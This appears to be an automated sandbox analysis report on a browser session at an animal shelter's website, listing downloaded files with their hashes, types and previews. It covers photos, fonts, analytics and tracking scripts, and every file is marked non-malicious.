                                                                                                                                                                                                                                                        SHA-512:EA2A9E24A87341AD9A54B90BC067C4C964953214E7C8CA7E53A39129BD1BB1F1F687BBC7A9194B3596E586F912A25A8EE33088EA90C52674C08BF00A374A5249
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/664b40dc-dc4d-442f-9566-be74b80b557a.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......{.......Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:21:51.iPhone 15 Plus.H.......H......."."...........'...................0232............................................696.........696.........0100........D...........D...............................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00.)\_.....)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....<...........2024:12:19 19:21:51.2024:12:19 19:21:51......%..o8...)...H..u...................#.[.E.X.Apple iOS...MM.3.......................x.......h...x..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 945 x 189, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10839
                                                                                                                                                                                                                                                        Entropy (8bit):7.857514783803224
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:naEG5DZT32otFc9jyRtRuULgFqxDkIB8GkOypopbKeF6kOY4fj23UP:narDZj29yRPxUFOBB8GnWopxF6vtj23k
                                                                                                                                                                                                                                                        MD5:7E384729A48C0CDE7915B4A93E5CB76B
                                                                                                                                                                                                                                                        SHA1:0837340AB3F6E88640A84EB6E46EA3E85987C03A
                                                                                                                                                                                                                                                        SHA-256:0A4789921D55398853BE0494882A3B44AE3796AB28581828D87290AD4A919875
                                                                                                                                                                                                                                                        SHA-512:AC7DB8B60AFBD7F3DF8BB6CD3CD98D3E81560659A01A94A9D0115BA057A33E68CC4EC86FE70B073CE74604D32B6A9FF462BD819AE36BCA6051128D82AF3A7C4F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2023/05/Logo_Horiz.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............e.......pHYs...#...#.x.?v.. .IDATx...Mn"....K5....#!1@...&L...S+(j..W.......I..L... !......A..M...GDfd..I.y.s.8...+"2.?..l..............j>-..k......cI.".?....x.oe...^............|X....t..?....S......b..x.I....sa.W[.G.............(...........G~..nm5....$}>.cf.........\.u.`S..:!.OjS.cI..>..G.y....E....6r.`.d.nl.'.).J.......@a.v$..T..'..............=....(."...<.X)Y.*.....+%.D.....!6+.j."..?s&ih#.Y}...+.....#.....BlF..a..h........S......b.......g.......f.... .z.|.%S}..)..r.N.X.......D9..3..>By$.:..D.....@.-q..h..~N..........B......9.B......5...b.....b=j......^.s.>.X........'.sYm4..(.$U.......b.....z.|...'....B.?Q .qT..w{.X....A....p.!6.......w!..... ................DG..GN........s.......jkI..j>.....e..(..$....G+k1g......!....K.~!ll$.$...:[V....!.....zaT...@...?r.....H[.m..K.6.n...XV......C...O...,....?....3I_%.63.......k#...[1....0...A..:..ZYV....}...$......W..4..[.\KZg4*.Z..kT.F.C.}....<="._..y.....$..(..gJFe
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2295
                                                                                                                                                                                                                                                        Entropy (8bit):5.296784129113934
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:jOLHJc+u3OLON0x/OCHJc+u3OCON0x/Ow6HJc+u3Ow6ON0xD:jOLHJc+u3OLONsOCHJc+u3OCONsOw6Hb
                                                                                                                                                                                                                                                        MD5:778A852169B9915F074813F574934721
                                                                                                                                                                                                                                                        SHA1:9B2197195201BEF8A6F843B87E41B68C3431C1B1
                                                                                                                                                                                                                                                        SHA-256:96059FF86A7CC24E5CABD6464F7DDEA0C86D8F97E6577C6D2EDE4AB638C8BECE
                                                                                                                                                                                                                                                        SHA-512:0D840B22824EED244092CDB8BDBB543C5A42AFACEA3C8717D7832ECD66381312D02542EB537D88937C634CD497DFACF24C12CBA319E92C329B1FFE0CA193190A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=Sen:400,700,800&subset=latin"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'Sen';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sen/v9/6xKjdSxYI9_3kvWNEmo.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Sen';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sen/v9/6xKjdSxYI9_3nPWN.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Sen';. font-style: normal;. font-weight: 700;. src: url(https://fonts.gstatic.com/s/sen/v9/6xKjdSxYI9_3kvWNEmo.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4048)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):30011
                                                                                                                                                                                                                                                        Entropy (8bit):5.432846813068331
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYEqBulI3kPd0BWlSFRKq4zSIGc:RIT7sZwuvL54WAcl/h0s
                                                                                                                                                                                                                                                        MD5:1DFF7F02A28FCACE35F1B358D2634AFA
                                                                                                                                                                                                                                                        SHA1:149559AF021EE1531AC541AC8085EA18F963D0FE
                                                                                                                                                                                                                                                        SHA-256:62339772926D1CCE25B934059DE452B09D253914F2A8EC96DC2C532612164927
                                                                                                                                                                                                                                                        SHA-512:D3860F234E8B7DA7AEC48E7A146A7A05AC82B24C6F63D9B35322FBBA587531B5A08C9DFF4DA60829EA9F7A5A1E5A395FA489EC6A6FDC51EB900323E86D8E0612
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=17.5.1, datetime=2024:11:19 16:54:13, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):60035
                                                                                                                                                                                                                                                        Entropy (8bit):7.914297279796416
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:931ZsmQEV6oTkKaGjm78qw82NqDtAme2oKR7w:93nDkKTm8qwHNytRen
                                                                                                                                                                                                                                                        MD5:081EB3A03772BAB53D508A6C51DDE48B
                                                                                                                                                                                                                                                        SHA1:DC1A4E197BA80ED7559673C2A980F2875E5C978E
                                                                                                                                                                                                                                                        SHA-256:3449051A754150D449E05C881F656596994F8078F19C07FC380102D67D7198AF
                                                                                                                                                                                                                                                        SHA-512:8EED9A293BEE5ADF628952878130154B2D91C623FE65143404D8141F5BFD467E203B2F18A81B2B6B0B3D28113A5BDF608A144ED54DF657701DC833AE3C50E252
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......c.......Apple.iPhone 15 Plus.H.......H.......17.5.1.2024:11:19 16:54:13.iPhone 15 Plus.H.......H......."."...........'...................0232............................................453.........453.........0100........P...........................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...............-05:00.-05:00.-05:00.)\_.....)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....(...........2024:11:19 16:54:13.2024:11:19 16:54:13..m......o8...)............................R.9.X.Apple iOS...MM.1.......................`.......h...`..............
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7155)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):322901
                                                                                                                                                                                                                                                        Entropy (8bit):5.57162290624448
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:sK2+EG+3bw/YHzp1rl03rQ1A5yCOA7LcGB84x94czxKonhsGH3voElwH:sy+3bsYH13SVUCTv4QKonhsGHg/
                                                                                                                                                                                                                                                        MD5:48797722E4CD0655E5269E074DC717CD
                                                                                                                                                                                                                                                        SHA1:B61A747D5E981511145D322A7FF98A492EE4728B
                                                                                                                                                                                                                                                        SHA-256:C31CE5747438FD03AE9D59763A1A1762692DDF143FDC6E6BF8451E658E0DDF86
                                                                                                                                                                                                                                                        SHA-512:C65D44B15707B312C1A1224E0EEA3A05D6CC766CC0D5070033EFADBAFBD7DCD3F6C754CE3C1F83DAF46FAEF453BB3291322AECDF8882B7BEC8907D9C1EA923F5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"33",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5112), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5112
                                                                                                                                                                                                                                                        Entropy (8bit):5.934116532543507
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:1g2VilZtckx+9DgTlPJdiLW+iSah8vf1dtzlTaI0AEdHBg6XhP4HYtPVy:12cV9sT3AW7NIzyd+KdHc
                                                                                                                                                                                                                                                        MD5:788F75A4DEAC89A2CD1C45C448B7E0B8
                                                                                                                                                                                                                                                        SHA1:E7B0F42020B599ED95C09AD05A3232B1F37BDC2F
                                                                                                                                                                                                                                                        SHA-256:AFBCDE9C89B4FA56E9A87FCC3B8BC65C81785DC0AB1BC237F95EFDD2E5AC5D0A
                                                                                                                                                                                                                                                        SHA-512:29B20252D688B3D985FBCA178E4118CBB83EC0FAA7569BC698D7934C832CFFDB75C93877593E9BA432866FC311C773C27F9A80B66CE4F7495C07173DF3212EAA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(a,b,c){if(!c||a!=null){c=t[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} function v(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],g;!a&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;b=b(c);b!=null&&(a?h(q,d,{configurable:!0,writable:!0,value:b}):b!==c&&(t[d]===void 0&&(a=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+a+"$"+d),h(g,t[d],{co
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3737)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3738
                                                                                                                                                                                                                                                        Entropy (8bit):5.2321193127066
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:nWPFWb8DMlLMwqaR7x/xKDyeU1Sxw1Ofk5FlqewdOGCleY+z0ci+HMCfrWH/rU/U:W4vB1/ZfSG1OMZw5Yjci+4kqcbqPTbv
                                                                                                                                                                                                                                                        MD5:91DFD4F1881C2DC5438B0F59B6141BCA
                                                                                                                                                                                                                                                        SHA1:C33C7CFCBB77E45E06D5F07DB1940998A98CFC5E
                                                                                                                                                                                                                                                        SHA-256:1225D0AB9896A0407548EB96D12406EC9392154B9DD616806D9FC29CEF06F27C
                                                                                                                                                                                                                                                        SHA-512:B519E2E96CC920CDE417CF607555CA3DEF6D89E155D98B95DA855A099282EA278CD8E801BA17533B7DED15AAAA50D40063A9ADDF70FB21889A714CE556DC1B87
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:!function(o,i){o.cntrUpTag={pixelserv:"https://pixel.sitescout.com",pixelsync:"https://pixel-sync.sitescout.com",clickserv:"https://clickserv.sitescout.com/conv/",vendorId:156,sync:function(){var r=o.cntrUpTag.pixelsync+"/dmp/asyncPixelSync",a=i.createElement("iframe");(a.frameElement||a).style.cssText="width: 0; height: 0; border: 0; display: none !important;",a.src="javascript:false",s(function(t,n){i.body.appendChild(a);var e=a.contentWindow.document,c=[];t&&c.push("gdpr_consent="+encodeURIComponent(t)),"boolean"==typeof n&&c.push("gdpr="+(n?"1":"0")),c=c.join("&"),r+=c?"?"+c:"",e.open().write("<body onload=\"window.location.href='"+r+"'\">"),e.close()})},track:function(e,t){var c=o.cntrUpTag.pixelserv+"/up/"+t;s(function(t,n){g(c+p([],e,t,n))})},conv:function(t,n,e){var c=o.cntrUpTag.clickserv,r=[];if(e&&r.push("transactionId="+e),n&&t)c=c+t+"/"+n;else{if(!t)return;c+=t}s(function(t,n){g(c+p(r,"cntrData",t,n))})},iap:function(t){var e=o.cntrUpTag.pixelserv+"/iap/"+t;s(function(t,n)
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4358)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5520
                                                                                                                                                                                                                                                        Entropy (8bit):5.07877659735423
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:PwSrH5hrG6Qpw1rIN2Bkqsu6B89w1y+7Y3qv5StcXyuC0r4oYeTnf49uVhWWTfju:PwSrq6Qpw1rI2k1u6i9woa3hSSCP9+XC
                                                                                                                                                                                                                                                        MD5:6823120876C9AFC8929418C9A6F8E343
                                                                                                                                                                                                                                                        SHA1:90B0ADB37D70FFEC5F9189C36BB0027C310C9502
                                                                                                                                                                                                                                                        SHA-256:B65B3DE1BC923B9355248A0D941A0EAEE15DFB9A6B8EADB51323A8DF6189DCD1
                                                                                                                                                                                                                                                        SHA-512:63D84226815C831245754ADB30040EE72DCF218D01F991A5619675374BBE3B706E3721D32F5120D9D27E500813E8214244992B3875B3A7E7E4BC7DED5201183A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */./*!. * imagesLoaded PACKAGED v5.0.0. * JavaScript is all like "You images are done yet or what?". * MIT License. */.!function(t,e){"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=typeof window?window:this,(function(){function t(){}let e=t.prototype;return e.on=function(t,e){if(!t||!e)return this;let i=this._events=this._events||{},s=i[t]=i[t]||[];return s.includes(e)||s.push(e),this},e.once=function(t,e){if(!t||!e)return this;this.on(t,e);let i=this._onceEvents=this._onceEvents||{};return(i[t]=i[t]||{})[e]=!0,this},e.off=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;let s=i.indexOf(e);return-1!=s&&i.splice(s,1),this},e.emitEvent=function(t,e){let i=this._events&&this._events[t];if(!i||!i.length)return this;i=i.slice(0),e=e||[];let s=this._onceEvents&&this._onceEvents[t];for(let n of i){s&&s[n]&&(this.off(t,n),delete s[n]),n.apply(this,e)}return this},e.allOff=function(){return d
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15448), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):15448
                                                                                                                                                                                                                                                        Entropy (8bit):5.117831950273977
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:8I3Zvzlj9UZWJJzFMnWoOSQuiuOclRJvl6Md3aDj8AhF/XjzJ8ZZwIRrWAcSr7La:8I3Zvzlj9UWJJzFMFQuiuOclRJvl6Y3o
                                                                                                                                                                                                                                                        MD5:3AAFF408519478A9CB4705C07228E358
                                                                                                                                                                                                                                                        SHA1:D56FCD6923789BC3375A373F598511B6760697DE
                                                                                                                                                                                                                                                        SHA-256:BA4A6484D2753269A4A3B2CE8017D03D2AE957E4305E3B176F46F5632D2E8116
                                                                                                                                                                                                                                                        SHA-512:8FCF288BD650A754CBC9A96B83B50C1B53A97CBDEFB2CE9220FBFB0DF219E726939980D32B923B3EA3E5CE62C53AFC3793C21697855BE7AA902C9C51F3D9D1E3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{var e={74208:e=>{void 0===TCB_Front.js_modules.menu&&TCB_Front.setModuleLoadedStatus("menu",!1),function(t,n){if(TCB_Front.isModuleLoaded("menu"))return;const o=e=>["auto","scroll","hidden"].includes(e.css("overflow"));let i;function s(e){return t(e).closest(".thrv_widget_menu")}const a={init(){tve_frontend_options.is_editor_page||a.frontendInit(),a.customMenuSwitchIcon(),i||(i=a.customMenuSwitchIcon.bind(this,!1),n.addResizeCallback(i)),a.zIndexOrder(),t(".thrv_widget_menu").each(((e,t)=>{a.addMutationListener(t)})),a.handleHiddenItems()},handleHiddenItems(){t(".thrv_widget_menu ul").each(((e,n)=>{const o=t(n),i=o.closest("li").find("> a .tve-item-dropdown-trigger"),s=this.hasVisibleItems(o);s||n.style.setProperty("display","none","important"),i.toggle(s)}))},hasVisibleItems(e){let t=!1;return e.find("> li").each(((e,n)=>{getComputedStyle(n).getPropertyValue("display").includes("none")||(t=!0)})),t},zIndexOrder(){const e=t("ul.tve_w_menu");n.highestZIndex=e.length+6;let o=n.high
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:28:39, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):49238
                                                                                                                                                                                                                                                        Entropy (8bit):7.90627361949806
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:6x3PPy/1MWuY0ODsnCZgdSi+5Fzm/oE1qB01lcI5hJUD6TuOtbAM65L+xBqLuddl:a3PPmeWF0Ci+fCnTlcIF5s4ALiv1xp
                                                                                                                                                                                                                                                        MD5:4847E19BA833FA53AA06749082290665
                                                                                                                                                                                                                                                        SHA1:C1A512F7B6F87D5681640031AEB801A5C03D8137
                                                                                                                                                                                                                                                        SHA-256:ACAF22A6107E1E545E5A1885267BAB72A9105CD8521083679A24BEA0655499BD
                                                                                                                                                                                                                                                        SHA-512:0F3233B58E107E8B86081849F37DEAA172D93E8F4B157FDB3BDD3BED785C27543654736D6F8A75240600E3463C71666256840EE13306645765969A027A28C2A9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/048ac518-b094-424d-a5c8-fbbf4ace67ca.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 15 Plus.H.......H.......18.1.1.2024:12:19 19:28:39.iPhone 15 Plus.H.......H......."."...........'...................0232............................................013.........013.........0100....................................................................................................................................2...........3...........4...2............... ...........(...........0...........D...........X...........`...........h...........p...........x...............|...%...........-05:00.-05:00.-05:00..Q......)\_.....................Apple.iPhone 15 Plus back dual wide camera 5.96mm f/1.6.....(...........2024:12:19 19:28:39.2024:12:19 19:28:39..m......o8...).......(..................#.[.E.X.Apple iOS...MM.3...................2...x.......h..................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):71159
                                                                                                                                                                                                                                                        Entropy (8bit):5.337584819945569
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicIv:RIT7Vs9ZVKBYj8wKcHIv
                                                                                                                                                                                                                                                        MD5:E4ADEF98CB0258BDE5C3316D745660E6
                                                                                                                                                                                                                                                        SHA1:726993C048DE62E9A188B889B652C3BF5EDEC469
                                                                                                                                                                                                                                                        SHA-256:D07BBBB09A0E9A781280A6237EDD6BC7A34447ECE1C5168C670FC3F37131536A
                                                                                                                                                                                                                                                        SHA-512:1C5CB9835F53817201A6024163DE21E4119136E5A8EB33B781EAF3673077734487AFBE0F1802C2FB12FE620FFFC89B06DEAF274DD93EC6FC09D44CDEE063160F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (22652), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):22652
                                                                                                                                                                                                                                                        Entropy (8bit):5.130075462655113
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:utRoCC81i123OT8aY12/LxvhiS5dPx7jgBUlLHUnrSzhYdU7J7jmIR78tXTeDPvH:utRq81i123c8aY12/LviS3x7jgBUlL0A
                                                                                                                                                                                                                                                        MD5:F9FB1DB593A7662FBDD8771F402D2DA3
                                                                                                                                                                                                                                                        SHA1:C0BF28918B70C02E42A1A067122C13E8B24C3B44
                                                                                                                                                                                                                                                        SHA-256:25DB9B261556022E99A1966AFFB79F087FFB830FDF7201B23198CD58180907C8
                                                                                                                                                                                                                                                        SHA-512:95F3AC812BDA6A4BC571013D9AEB1304A15A9DAD70A0DEB26BE82C7B2E41FD49400283D4BD829A4BF734F085AF51F8A33ECEC3FD4A9CB1C7061008715E717118
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
